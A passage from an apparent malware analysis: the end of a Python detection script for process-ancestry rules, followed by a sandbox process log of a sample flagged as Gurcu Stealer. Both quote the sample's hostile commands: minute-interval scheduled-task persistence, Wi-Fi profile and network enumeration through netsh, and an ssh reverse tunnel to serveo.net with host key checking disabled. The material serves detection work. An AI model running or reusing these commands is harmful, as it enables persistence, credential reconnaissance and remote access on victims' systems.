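    cur: Optional[ProcEvent] = ev
    seen = set()
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        if not WINDOWS_DIR.match(cur.image):
            return cur
        cur = by_pid.get(cur.ppid)
    return None


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, int, str]]:
    """Return (rule name, pid, image of the responsible ancestor) per hit."""
    by_pid = {e.pid: e for e in events}
    hits: List[Tuple[str, int, str]] = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                anc = responsible_ancestor(ev, by_pid)
                hits.append((name, ev.pid, anc.image if anc else ev.image))
    return hits


# Constructed events: images and command lines from the report, PIDs and
# parent links invented (Targets 10 and 11 are both attached to pid 1000),
# plus three benign controls that must not fire.
STEALER = r"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 4, STEALER, f'"{STEALER}"'),
    ProcEvent(1001, 1000, SYS32 + r"\schtasks.exe",
              f'schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "{STEALER}" /rl HIGHEST /f'),
    ProcEvent(1002, 1000, SYS32 + r"\cmd.exe",
              r'"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'),
    ProcEvent(1003, 1002, SYS32 + r"\chcp.com", "chcp 65001"),
    ProcEvent(1004, 1002, SYS32 + r"\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(1005, 1002, SYS32 + r"\findstr.exe", r'findstr /R /C:"[ ]:[ ]"'),
    ProcEvent(1006, 1000, SYS32 + r"\cmd.exe",
              r'"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"'),
    ProcEvent(1007, 1006, SYS32 + r"\netsh.exe", "netsh wlan show networks mode=bssid"),
    ProcEvent(2001, 2000, SYS32 + r"\cmd.exe", "cmd.exe /c dir"),
    ProcEvent(2002, 2001, SYS32 + r"\netsh.exe", "netsh interface show interface"),
    ProcEvent(2003, 2000, SYS32 + r"\schtasks.exe",
              r'schtasks /create /tn "NightlyBackup" /sc DAILY /tr "C:\Program Files\Backup\backup.exe" /rl HIGHEST /f'),
]

if __name__ == "__main__":
    for name, pid, origin in evaluate(SAMPLE_EVENTS):
        print(f"{name:36} pid={pid} origin={origin}")
```

Every hit resolves to vkefq4cv.oil.exe rather than to cmd.exe or netsh.exe, which is the process a responder would kill and the path to hand to the scheduled-task cleanup; the benign `netsh interface` call and the DAILY task under Program Files stay silent.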

                                                                                                    Target ID:23
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:24
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:25
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:26
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:27
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:28
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:29
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:30
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:31
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:32
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:33
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:34
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:35
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:36
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:41
                                                                                                    Start time:16:17:22
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                                                                                                    Imagebase:0x7ff6065e0000
                                                                                                    File size:570'736 bytes
                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:42
                                                                                                    Start time:16:18:01
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x17a71230000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:44
                                                                                                    Start time:16:19:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1ec7f190000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:45
                                                                                                    Start time:16:20:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x167cfae0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:46
                                                                                                    Start time:16:21:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1cf0ab30000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    No disassembly